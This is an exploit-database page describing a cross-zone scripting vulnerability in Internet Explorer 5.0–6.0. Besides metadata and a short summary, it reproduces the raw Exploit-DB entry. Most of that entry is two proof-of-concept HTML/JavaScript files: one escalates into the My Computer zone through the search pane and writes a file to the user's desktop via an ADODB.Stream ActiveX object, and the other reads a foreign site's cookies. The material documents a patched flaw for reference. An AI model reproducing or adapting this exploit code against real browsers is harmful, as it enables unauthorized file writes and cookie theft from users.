header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Cheng Peng Su
8.3
CVSS
HIGH
Cross-Zone Scripting
79
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.0
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Cross-Zone Scripting Vulnerability in Microsoft Internet Explorer

Cross-Zone Scripting is a vulnerability in Microsoft Internet Explorer that allows malicious scripts and Active Content to access document properties across different Security Zones and foreign domains. This vulnerability is exposed when search panes are opened via the window.open method. It is possible for malicious script code to access the properties of a foreign domain opened within the search pane. An example of this vulnerability is demonstrated in the code snippets provided, where a malicious script is used to create a file on the user's desktop.

Mitigation:

Microsoft has released a patch to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9798/info

A vulnerability has been reported in Microsoft Internet Explorer that could enable unauthorized access by malicious scripts and Active Content to document properties across different Security Zones and foreign domains. This issue is exposed when search panes are opened via the window.open method. It is possible for malicious script code to access the properties of a foreign domain opened within the search pane.

---------------------------CrossZone.htm---------------------------
<script>
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){

// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

inject_html="<img src='" + img_src + "'>";

window.open('file:javascript:document.write("' + inject_html + '")','_search');

},5000);

&lt;/script&gt;
-------------------------------End---------------------------------

---------------------------CrossSite.htm---------------------------
&lt;script&gt;

window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);

&lt;/script&gt;
-------------------------------End---------------------------------

Navigation

Suggest Exploit

Services By CQR